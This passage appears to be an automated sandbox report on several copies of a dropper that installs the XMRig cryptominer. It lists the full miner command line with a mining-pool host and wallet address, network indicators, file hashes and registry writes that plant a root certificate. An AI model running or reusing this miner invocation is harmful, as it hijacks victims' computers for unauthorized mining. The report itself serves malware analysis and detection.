N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 211.143.182.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/4776-14-0x00000270DFB40000-0x00000270DFB60000-memory.dmp

memory/4776-15-0x00000270DFC90000-0x00000270DFCB0000-memory.dmp

memory/4776-16-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-17-0x00000270DFCB0000-0x00000270DFCD0000-memory.dmp

memory/4776-18-0x00000270DFCD0000-0x00000270DFCF0000-memory.dmp

memory/4776-19-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-20-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-21-0x00000270DFCB0000-0x00000270DFCD0000-memory.dmp

memory/4776-23-0x00000270DFCD0000-0x00000270DFCF0000-memory.dmp

memory/4776-22-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-24-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-25-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-26-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-27-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-28-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-29-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-30-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-31-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-32-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-33-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-34-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-35-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-36-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-37-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-38-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-39-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-40-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-41-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-42-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-43-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-44-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-45-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-46-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-47-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-48-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-49-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-50-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-51-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-52-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-53-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-54-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-55-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-56-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-57-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-58-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-59-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-60-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-61-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-62-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-63-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-64-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-65-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-66-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-67-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-68-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-69-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-70-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-71-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-72-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-73-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-74-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-75-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-76-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-77-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-78-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-79-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-80-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-81-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

memory/4776-82-0x00007FF67C4C0000-0x00007FF67CFC3000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-06-14 05:12

Reported

2024-06-14 06:39

Platform

win10v2004-20240611-en

Max time kernel

1793s

Max time network

1791s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 27.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/516-14-0x00000215CD780000-0x00000215CD7A0000-memory.dmp

memory/516-15-0x00000215CEF80000-0x00000215CEFA0000-memory.dmp

memory/516-16-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-18-0x00000215CEFC0000-0x00000215CEFE0000-memory.dmp

memory/516-17-0x00000215CEFA0000-0x00000215CEFC0000-memory.dmp

memory/516-19-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-20-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-23-0x00000215CEFC0000-0x00000215CEFE0000-memory.dmp

memory/516-22-0x00000215CEFA0000-0x00000215CEFC0000-memory.dmp

memory/516-21-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-24-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-25-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-26-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-27-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-28-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-29-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-30-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-31-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-32-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-33-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-34-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-35-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-36-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-37-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-38-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-39-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-40-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-41-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-42-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-43-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-44-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-45-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-46-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-47-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-48-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-49-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-50-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-51-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-52-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-53-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-54-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-55-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-56-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-57-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-58-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-59-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-60-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-61-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-62-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-63-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-64-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-65-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-66-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-67-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-68-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-69-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-70-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-71-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-72-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-73-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-74-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-75-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-76-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-77-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-78-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-79-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-80-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-81-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

memory/516-82-0x00007FF6FF9D0000-0x00007FF7004D3000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-06-14 05:12

Reported

2024-06-14 06:39

Platform

win10v2004-20240611-en

Max time kernel

1794s

Max time network

1803s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a